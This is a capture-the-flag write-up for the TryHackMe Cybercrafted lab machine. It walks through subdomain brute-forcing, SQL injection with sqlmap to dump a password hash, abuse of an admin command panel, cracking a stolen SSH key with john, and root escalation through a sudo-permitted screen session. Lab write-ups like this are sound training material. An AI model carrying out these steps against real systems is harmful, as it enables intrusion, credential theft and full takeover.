TryHackMe Cybercrafted Writeup
Cybercrafted TryHackMe Walkthrough
Reconnaissance
As always start with the Nmap.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-21 23:54 ESTNmap scan report for cybercrafted.thm (10.10.61.207)Host is up (0.17s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)| 256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)|_ 256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: Cybercrafted25565/tcp open minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r ck00r, Users: 0/1)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds
here we get the HTTP server and ssh service.
HTTP
Let’s Enumerate the HTTP first.
When we browse the IP address into a browser it redirects us to http://cybercrafted.thm/
. Add it to /etc/hosts
file.
index.html
serves a static image.
Review source code we get an HTML comment.
<!-- A Note to the developers: Just finished up adding other subdomains, now you can work on them! -->
We need to find a subdomain for the machine. Lets bruteforce for subdomains.
` ffuf -w /usr/share/wordlist/dirb/common.md -u http://cybercrafted.thm/ -H “Host: FUZZ.cybercrafted.thm”`
by brute-forcing, we get three subdomains.
- www
- store
- admin
add subdomain in /etc/hosts
file.
/admin looks interesting.
Try some SQL injection bypass techniques but failed.
/store is a Forbidden resource. but when we do directory fuzzing on store.cybercrafted.thm we get /search.php
search.php
searches items from the database so it might be vulnerable to SQL injection. Let’s test using sqlmap
.
Capture the search.php
request in burp and save it to sqltest.txt
POST /search.php HTTP/1.1Host: store.cybercrafted.thmUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 22Origin: http://store.cybercrafted.thmConnection: closeReferer: http://store.cybercrafted.thm/search.phpUpgrade-Insecure-Requests: 1search=testing&submit=
sqlmap -r sqltest --batch --dbs
/search.php is vulnerable to SQL injection.
available databases [5]:[*] information_schema[*] mysql[*]performance_schema [*] sys[*] webapp
Enumerate the database found user and hash.
xXUltimateCreeperXx: 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01
after cracking the hash got password: di*************9
user xXUltimateCreeperXx:di*************9
Login into admin.cybercrafted.thm
After login, we got /panel.php
on which we can run system commands.
From here we can get a shell by various ways.
Gaining Access
Mostly I prefer ssh shell because it’s the stable one.
from panel.php
get xXUltimateCreeperXx user’s private ssh key.
A private key is encrypted. Let’s crack it using ssh2john
and john
ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlist/rockyou.txt
john crack the password successfully: c*********6
Login as xxultimatecreeperxx
Privilege Escalation
Escalate from xxultimatecreeperxx to cybercrafted
After downloading linpeas.sh
to the target machine and enumerating it for some time I find Minecraft server on the machine.
this Minecraft server has a plugin called loginsystem
which has a log file called log.txt
.
/opt/mincraft/cybercrafted/plugins/LoginSystem/log.txt
From this file, we get the password for cybercrafted
user.
cybercrafted:J*****************k
Log in as cybercrafted
.
Now we have a password for cybercrafted
.
Escalate from cybercrafted to root
Did some enumeration on the box and found out that cybercrafted
can run /usr/bin/screen
as root.
Matching Defaults entries for cybercrafted on cybercrafted:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser cybercrafted may run the following commands on cybercrafted:(root) /usr/bin/screen -r cybercrafted
screen
is used to start a screen session or open any number of the window inside a session.
/usr/bin/screen -r cybercrafted
here -r
used to resume the screen session of user cybercrafted
.
After some research, I found out that we can create a new window with a shell using screen
.
sudo -u /usr/bin/screen -r cybercrafted
it attaches the screen of cybercrafted
. then use shortcut ctrl+a+c
and we get a root shell.
ctrl+a+c
is used to create a new window with shell. and this program is running as root we get root window shell.